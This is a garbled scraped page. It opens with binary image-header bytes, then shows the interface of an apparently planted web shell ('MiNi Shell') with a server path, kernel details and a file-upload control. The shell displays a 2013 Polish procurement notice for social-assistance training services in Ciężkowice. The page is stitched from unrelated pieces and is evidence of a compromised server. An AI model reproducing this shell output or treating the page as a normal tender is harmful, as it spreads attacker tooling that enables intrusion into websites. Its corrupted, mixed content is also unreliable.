JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130418/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130418/153848-N-2013.html

<p class="kh_header"><b>Ciężkowice: Usługi szkoleniowe i konsultacje wyjazdowe w ramach działań o charakterze środowiskowym dla Beneficjentów Projektu systemowego  Czas na prace w Gminie Ciężkowice współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 153848 - 2013; data zamieszczenia: 18.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Ciężkowicach , ul. Tysiąclecia 19, 33-190 Ciężkowice, woj. małopolskie, tel. 14 62 85 839, faks 14 62 85 820.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe i konsultacje wyjazdowe w ramach działań o charakterze środowiskowym dla Beneficjentów Projektu systemowego  Czas na prace w Gminie Ciężkowice współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie składa się z:
A.Kompleksowa realizacja merytoryczna i obsługa techniczno-logistyczna usług szkoleniowych z zakresu rozwoju osobistego oraz edukacyjnego dla 46 osób 
I. Szkolenia dla dorosłych
-Liczba osób: 31
-Liczba godzin szkoleniowych: 183
-Miejsce realizacji szkoleń: Gmina Ciężkowice
-Termin realizacji:
-Dostarczenie przez Wykonawcę wskazanych Instrumentów Aktywnej Integracji.
-Szczegóły szkoleń poniżej. W nawiasach podano odpowiednio: wymaganą liczbę godzin szkoleniowych; kompetencje trenera; Instrument Aktywnej Integracji, który musi być dostarczonych w ramach tematu: 
Szkolenie 1. Rozwój kompetencji zawodowych i społeczno-osobowych, dla jednej grupy 31 osobowej, które obejmuje następujące tematy: Współczesny rynek pracy oraz przygotowanie dokumentów aplikacyjnych (6; doradca zawodowy; IEZ(e)); Trening rozmów kwalifikacyjnych (6; ekspert lub doradca zawodowy; IAE(c)); Profesjonalizm w pracy zawodowej (6; ekspert; IAE(c)); Trening kompetencji 
społecznych - warsztaty NLP (6; certyfikowany ekspert NLP; IAS(j));Rozwiązywanie konfliktów rodzinnych i pozarodzinnych (3, psycholog, IAS(k)); Wpływ przemocy na społeczeństwo (3, ekspert, IAS(k)); Wsparcie umiejętności osobowych - warsztaty NLP (6, certyfikowany ekspert NLP, IAS(l)); Trening kompetencji i umiejętności rodzicielskich (6, psycholog, IAS(j)). Razem szkolenie 1.: 42 godziny szkoleniowe.
Szkolenie 2. Szkolenie z obsługi kasy fiskalnej - dla 25 osób w tym 3 grupy po 8-9 osób, obejmujące następujące tematy: Teoretyczne aspekty obsługi kas fiskalnych - 3 godznagr (9, ekspert, IAE(c)); Elementy rachunkowości niezbędne przy obsłudze kas fiskalnych - 3 godznagr (9, ekspert, IAE(c)); Obsługa kas fiskalnych - warsztaty praktyczne z kasami fiskalnymi, 18 godznagr (54, ekspert, IAE(c)). Razem szkolenie 2.: 72 godziny szkoleniowe.
Szkolenie 3. Szkolenie z opieki nad osobą zależną dla jednej grupy 12 osobowej, które obejmuje następujące tematy: Etyka pracy opiekuna osoby zależnej (1, ekspert, IAE(c)); Charakterystyka instytucji, placówek i punktów pomocy osobom zależnym (1, ekspert, IAE(c)); Przepisy sanitarne, bhp (2, ekspert, IAE(c)); Aspekty prawne pracy w zawodzie opiekuna osoby zależnej (3, ekspert, IAE(c)); Higiena i pielęgnacja osób zależnych (2, ekspert-pielęgniarka, IAE(c)); Pierwsza pomoc przed medyczna (2, ekspert-pielęgniarka, IAE(c)); Dietetyka (2, ekspert-pielęgniarka, IAE(c)); Podstawowe zagadnienia z zakresu farmacji (2, ekspert-pielęgniarka, IAE(c)); Komunikacja z osobami zależnymi i ich rodziną (3, ekspert, IAE(c)); Praca z trudnym podopiecznym i rozwiązywanie problemów (3, ekspert, IAE(c)); Zasady konstruowania i skutecznej realizacji indywidualnych planów wsparcia (3, ekspert, IAE(c)); Organizacja czasu wolnego osobie zależnej (3, ekspert, IAE(c)); Praktyka (12, zakład pracy, IAE(c)). Razem szkolenie 3.: 39 godzin szkoleniowych.
Szkolenie 4. Szkolenie z projektowania ogrodów przydomowych dla jednej grupy 13 osobowej, które obejmuje następujące tematy: Historia sztuki ogrodowej (6, ekspert, IAE(c)); Projekt: projekt techniczny, plan nasadzeń (6, ekspert, IAE(c)); Rośliny w projekcie: zasady kompozycji ogrodów, operowanie barwą, wymagania środowiskowe (6, ekspert, IAE(c)); Elementy ogrodu: mała architektura, woda, oświetlenie (6, ekspert, IAE(c)); Konsultacje na tematy interesujące BO (6, ekspert, IAE(c)); Razem szkolenie 4.: 30 godzin szkoleniowych.
II. Szkolenia dla młodzieży
-Liczba osób: 15
-Liczba godzin szkoleniowych: 77
-Miejsce realizacji szkoleń: Gmina Ciężkowice
-Termin realizacji:
-Dostarczenie przez Wykonawcę wskazanych Instrumentów Aktywnej Integracji.
-Szczegóły szkoleń poniżej. W nawiasach podano odpowiednio: wymaganą liczbę godzin szkoleniowych; kompetencje trenera; Instrument Aktywnej Integracji, który musi być dostarczonych w ramach tematu: 
Szkolenie 1. Rozwój kompetencji zawodowych i społeczno-osobowych dla jednej grupy 15 osobowej, które obejmuje następujące tematy: Współczesny rynek pracy oraz przygotowanie dokumentów aplikacyjnych (6, doradca zawodowy, IAE(e)); Trening rozmów kwalifikacyjnych (6, ekspert lub doradca zawodowy, IAE(c)); Profesjonalizm w pracy zawodowej (6, ekspert, IAE(c)); Trening kompetencji społecznych - warsztaty NLP(6, certyfikowany ekspert NLP, IAS(j)); Reagowanie w konfliktach 
rodzinnych i pozarodzinnych (6, psycholog, IAS(k)); Wpływ przemocy na społeczeństwo (3, ekspert, IAS(k)); Wsparcie umiejętności osobowych - warsztaty NLP (6, certyfikowany ekspert NLP, IAS(l)); Trening kompetencji i umiejętności rodzicielskich (6, psycholog, IAS(j)); Sport przeciw agresji (35, ekspert, IAS(j)). Razem szkolenie 1.: 77 godzin szkoleniowych.
B. Kompleksowa realizacja merytoryczna i obsługa techniczno-logistyczna wyjazdów integracyjnych wraz z konsultacjami dla minimum 22 os.
-Liczba osób przypadających na wyjazd: minimum 22 os. - może ulec zwiększeniu, tj. 20 BO + 2 opiekunów, których zapewnia Wykonawca; liczba opiekunów musi być zgodna z przepisami prawa i dostosowana do BO.;
-Liczba wyjazdów: 2;
-Czas trwania pojedynczego wyjazdu: 3 dni;
-Liczba godzin konsultacyjnych podczas wyjazdów: 36 godz, w tym 6 godz. dziennie;
-Miejsce wyjazdów: poza Gminę Ciężkowice do gminy o cechach turystycznych;
-Termin realizacji:
-Wykonawca zapewnia (opłaca) dostęp do lokalnych atrakcji kulturalno-turystycznych dla każdego z uczestników wyjazdu;
-Szczegóły szkoleń poniżej. W nawiasach podano odpowiednio: wymaganą liczbę godzin konsultacyjnych; kompetencje trenera/eksperta.
Wyjazd integracyjny 1. Podczas którego zrealizowane zostaną następujące tematy konsultacji: Inwestujemy w Ciebie - Zainwestuj w Siebie (3, właściciel firmy/Wykonawcy); Pozytywne myślenie (4, psycholog); Motywacja w sytuacji zmiany (4, psycholog); Zagrożenia stojące przed społeczeństwem - warsztaty i pogadanki ze specjalistą (5, ekspert); Zmiany stylu życia, odrzucanie nałogów (2, ekspert); Razem liczba godz. konsultacji podczas wyjazdu integracyjnego 1.: 18 godzin
Wyjazd integracyjny 2. Podczas którego zrealizowane zostaną następujące tematy konsultacji: Zwiększenie wiary we własne siły (5, ekspert); Metody i techniki efektywnego uczenia się i przyswajania wiedzy (4, ekspert); W jakim zawodzie chciałbym pracować - konsultacje (6, doradca zawodowy); Media i ich wpływ na kulturę i zachowanie się mojego otoczenia i moje - w tym Internet i gry wideo (3, ekspert); Razem liczba godz. konsultacji podczas wyjazdu integracyjnego 2.: 18 godzin..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dot.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony jeżeli wykonawca w opisanym zakresie oświadczy, że posiada zaktualizowany wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy, właściwy ze względu na siedzibę instytucji szkoleniowej oraz wpis do rejestru podmiotów prowadzących agencje zatrudnienia, który prowadzi Marszałek Województwa właściwy do siedziby podmiotu prowadzącego działalność gospodarczą.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony jeśli wykonawca wykaże się odpowiednim doświadczeniem w realizacji szkoleń i zadań, które są przedmiotem niniejszego zamówienia, tj.:
- w okresie od 2010 do 2012 roku, wykonał należycie co najmniej po 1 szkoleniu rocznie przeprowadzonym w ramach Poddziałania 7.1.1 PO KL dla ośrodków pomocy społecznej (przedmiot szkoleń dowolny);
- w okresie od 2010 do 2012 roku wykonał należycie co najmniej po 1 szkoleniu rocznie z zakresu rozwoju kompetencji zawodowych, społecznych, osobowych w ramach Poddziałania 7.1.1 PO KL dla ośrodków pomocy społecznej;
- w okresie od 2010 do 2012 roku należycie zrealizował minimum 3 szkolenia/kursy z zakresu obsługi kasy fiskalnej w ramach Poddziałania 7.1.1 PO KL dla ośrodków pomocy społecznej
- w okresie od 2010 do 2012 roku należycie zrealizował minimum 3 szkolenia/kursy z zakresu opieki nad osobą zależną w ramach Poddziałania 7.1.1 PO KL dla ośrodków pomocy społecznej
- w okresie od 2010 do 2012 roku należycie zrealizował minimum 3 szkolenia/kursy z zakresu projektowania ogrodów przydomowych w ramach Poddziałania 7.1.1 PO KL dla ośrodków pomocy społecznej
- w okresie od 2010 do 2012 roku należycie zrealizował minimum 3 zorganizowane wyjazdy szkoleniowe (min. dwa noclegi z wyżywieniem i opieką; zapewnienie lokalnych atrakcji kulturalno-turystycznych, szkolenia/konsultacje) dla BO w ramach projektów systemowych - Poddziałanie 7.1.1 PO KL - dla ośrodków pomocy społecznej, w tym przynajmniej jeden wyjazd szkoleniowy dla grupy min. 20 osób;
- w okresie od 2010 do 2012 roku, wykonał należycie co najmniej 3 szkolenia/warsztaty/kursy z zakresu NLP - programowania neurolingwistycznego, przeprowadzone w ramach Podziałania 7.1.1 PO KL dla ośrodków pomocy społecznej;
- w okresie od 2010 do 2012 roku, wykonał należycie co najmniej 3 szkolenia/warsztaty/kursy z udziałem doradcy zawodowego, przeprowadzone w ramach Podziałania 7.1.1 PO KL dla ośrodków pomocy społecznej;
- w okresie od 2010 do 2012 roku, wykonał należycie co najmniej 3 szkolenia/warsztaty/kursy z udziałem psychologa, przeprowadzone w ramach Podziałania 7.1.1 PO KL dla ośrodków pomocy społecznej</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca może polegać na wiedzy  doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,  niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował osobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Aktualny Certyfikat potwierdzający stosowanie systemu zarządzania jakością i spełniania wymagań PN-EN ISO 9001:2009 w zakresie - organizowania i realizacji usług szkoleniowych i edukacyjnych, zgodny z IAF i PCA</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wrotamalopolski.pl/root_BIP/BIP_w_Malopolsce/gminy/root_Ciezkowice/Wprowadzenie/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://www.wrotamalopolski.pl/root_BIP/BIP_w_Malopolsce/gminy/root_Ciezkowice/Wprowadzenie/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2013 godzina 08:45, miejsce: Gminny Ośrodek Pomocy Społecznej w Ciężkowicach, ul. Tysiąclecia 19; 33-190 Ciężkowice, nie później niż do dnia 25.04. 2013r. do godziny 8:45.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PO KL Poddziałanie 7.1.1.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com